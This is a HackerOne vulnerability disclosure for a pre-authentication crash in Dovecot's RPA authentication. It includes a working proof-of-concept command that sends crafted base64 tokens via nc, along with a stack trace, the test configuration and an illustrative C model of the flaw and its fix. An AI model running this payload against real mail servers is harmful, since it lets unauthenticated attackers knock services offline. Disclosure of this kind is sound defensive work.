Open-Xchange: Pre-auth Denial-of-Service in Dovecot RPA implementation

HackerOne report #866605, reported by orange (hackerone.com)
Published: May 05, 2020, 16:45
Bounty: $550

CVSS3: 7.5 High
Attack Vector: NETWORK
Attack Complexity: LOW
Privileges Required: NONE
User Interaction: NONE
Scope: UNCHANGED
Confidentiality Impact: NONE
Integrity Impact: NONE
Availability Impact: HIGH
Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

CVSS2: 5 Medium
Access Vector: NETWORK
Access Complexity: LOW
Authentication: NONE
Confidentiality Impact: NONE
Integrity Impact: NONE
Availability Impact: PARTIAL
Vector: AV:N/AC:L/Au:N/C:N/I:N/A:P

Hi, Dovecot security team.

I am Orange from the DEVCORE security team. We just did a small security audit of Dovecot's authentication mechanisms and found a buffer over-read in the RPA implementation.

In mech-rpa.c, the function rpa_read_buffer does not check whether the length byte is zero and passes a size of zero to p_malloc(...). That trips the allocator's safety check, which calls i_panic and raises SIGABRT, terminating the whole dovecot/auth process.
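To illustrate the flaw just described, here is an added example (not Dovecot's code): it models the length-prefixed field reader of rpa_read_buffer beside a hardened version that rejects an empty field before allocating, with a stand-in allocator that counts the zero-size panic instead of aborting. All function and constant names are the example's own, and the two inputs are constructed.

```c
#include <stdlib.h>
#include <string.h>

/* Stand-in for Dovecot's p_malloc(), which i_panic()s (SIGABRT) on size 0;
 * here the panic is only counted so the program survives to report it. */
static int panic_count;
static void *pool_malloc(size_t size)
{
    if (size == 0) { panic_count++; return NULL; }
    return calloc(1, size);
}
/* Vulnerable shape of rpa_read_buffer: one length byte, then that many bytes.
 * len == 0 satisfies the bounds check and reaches the allocator. Returns the
 * copied field (caller frees) and advances *data, or NULL on failure. */
static unsigned char *read_field_vuln(const unsigned char **data,
                                      const unsigned char *end)
{
    const unsigned char *p = *data;
    unsigned char *buf; size_t len;
    if (p >= end) return NULL;
    len = *p++;
    if ((size_t)(end - p) < len) return NULL;
    if ((buf = pool_malloc(len)) == NULL) return NULL;  /* len 0: "panic" */
    memcpy(buf, p, len);
    *data = p + len;
    return buf;
}
/* Hardened shape: an empty field is malformed, so fail before allocating. */
static unsigned char *read_field_fixed(const unsigned char **data,
                                       const unsigned char *end)
{
    if (*data >= end || **data == 0) return NULL;
    return read_field_vuln(data, end);
}
/* Parses consecutive fields; returns their count, or -1 if one is rejected. */
static int count_fields(const unsigned char *msg, size_t n, int hardened)
{
    const unsigned char *p = msg, *end = msg + n; int count = 0;
    while (p < end) {
        unsigned char *b = hardened ? read_field_fixed(&p, end)
                                    : read_field_vuln(&p, end);
        if (b == NULL) return -1;
        free(b); count++;
    }
    return count;
}
/* Constructed inputs: the tail of the PoC's second message ("\x03A@A\x00")
 * ends in a zero length byte; the second sample is well formed. */
static const unsigned char poc_tail[] = {0x03, 'A', '@', 'A', 0x00};
static const unsigned char well_formed[] = {0x03, 'A', '@', 'A', 0x01, 'x'};
```

With the vulnerable reader the zero-length field reaches the allocator and the panic counter ticks; the hardened reader rejects the same input as malformed without ever allocating.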

PoC:

$ ps -ao pid,cmd | grep dovecot/auth
 25312 dovecot/auth

$ (echo 'AUTH RPA'; echo -ne '\x60\x11\x06\x09\x60\x86\x48\x01\x86\xf8\x73\x01\x01\x01\x00\x04\x00\x00\x01' | base64 -w 0; echo ; echo -ne '\x60\x11\x06\x09\x60\x86\x48\x01\x86\xf8\x73\x01\x01\x00\x03A@A\x00' | base64 -w 0; echo ; echo QUIT) | nc 127.0.0.1 110
+OK Dovecot ready.
+
+ YEkGCWCGSAGG+HMBAQMAIGQRQj/rSuEgBcOqNgYJRgZIbKOIvMFtVmW+dFdYtrc1YWZjNTcxYWQ1ZTNlMTcAC3BvcDNAdWJ1bnR1
-ERR [AUTH] Authentication failed.
+OK Logging out

$ ps -ao pid,cmd | grep dovecot/auth
 25467 dovecot/auth

Stack trace:

Legend: code, data, rodata, value
Stopped reason: SIGABRT
0xf7fc8079 in __kernel_vsyscall ()
gdb-peda$ bt
#0  0xf7fc8079 in __kernel_vsyscall ()
#1  0xf7bcd832 in raise () from /lib/i386-linux-gnu/libc.so.6
#2  0xf7bcecc1 in abort () from /lib/i386-linux-gnu/libc.so.6
#3  0xf7eb7656 in default_fatal_finish (status=0x0, type=LOG_TYPE_PANIC) at failures.c:459
#4  fatal_handler_real (ctx=ctx@entry=0xffb550e4, format=format@entry=0x5666baf7 "Trying to allocate %u bytes",
    args=args@entry=0xffb55114 "") at failures.c:471
#5  0xf7eb77b4 in i_internal_fatal_handler (ctx=0xffb550e4, format=0x5666baf7 "Trying to allocate %u bytes",
    args=0xffb55114 "") at failures.c:848
#6  0xf7df6499 in i_panic (format=0x5666baf7 "Trying to allocate %u bytes") at failures.c:523
#7  0x5664e236 in p_malloc (size=<optimized out>, pool=<optimized out>) at ../../src/lib/mempool.h:105
#8  rpa_read_buffer (buffer=<optimized out>, end=<optimized out>, data=<optimized out>, pool=<optimized out>)
    at mech-rpa.c:230
#9  rpa_parse_token3 (error=0xffb55140, data_size=<optimized out>, data=<optimized out>, request=<optimized out>)
    at mech-rpa.c:283
#10 mech_rpa_auth_phase2 (data_size=<optimized out>, data=<optimized out>, auth_request=<optimized out>)
    at mech-rpa.c:504
#11 mech_rpa_auth_continue (auth_request=<optimized out>, data=<optimized out>, data_size=<optimized out>)
    at mech-rpa.c:543
#12 0x56641a91 in auth_request_handler_auth_continue (handler=<optimized out>, args=<optimized out>)
    at auth-request-handler.c:696
#13 0x56632812 in auth_client_handle_line (line=0x5839b106 "CONT\t1\tYBEGCWCGSAGG+HMBAQADQUBBAA==",
    conn=<optimized out>) at auth-client-connection.c:228
#14 auth_client_input (conn=<optimized out>) at auth-client-connection.c:311
#15 0xf7ed4ddb in io_loop_call_io (io=0x5839d640) at ioloop.c:713
#16 0xf7ed6e5e in io_loop_handler_run_internal (ioloop=0x583879f0) at ioloop-epoll.c:222
#17 0xf7ed4ed2 in io_loop_handler_run (ioloop=0x583879f0) at ioloop.c:765
#18 0xf7ed5139 in io_loop_run (ioloop=0x583879f0) at ioloop.c:738
#19 0xf7e2d0a5 in master_service_run (service=0x58387920, callback=0x566303b0 <client_connected>)
    at master-service.c:809
#20 0x5662ff70 in main (argc=<optimized out>, argv=<optimized out>) at main.c:395
#21 0xf7bb8e81 in __libc_start_main () from /lib/i386-linux-gnu/libc.so.6
#22 0x566301a1 in _start ()

Environment

We tested this bug on Dovecot core 2.3.10; our configuration is:

# 2.3.10 (): dovecot.conf
# OS: Linux 4.15.0-96-generic x86_64 Ubuntu 18.04.1 LTS
# Hostname: ubuntu
auth_mechanisms = plain login rpa
default_internal_user = orange
default_login_user = orange
namespace inbox {
  inbox = yes
  location =
  mailbox Drafts {
    special_use = \Drafts
  }
  mailbox Junk {
    special_use = \Junk
  }
  mailbox Sent {
    special_use = \Sent
  }
  mailbox "Sent Messages" {
    special_use = \Sent
  }
  mailbox Trash {
    special_use = \Trash
  }
  prefix =
}
passdb {
  driver = shadow
}
userdb {
  driver = passwd
}

Impact

Denial of service. Note that the crash happens before authentication completes, so an attacker can crash a remote Dovecot server without knowing any password.
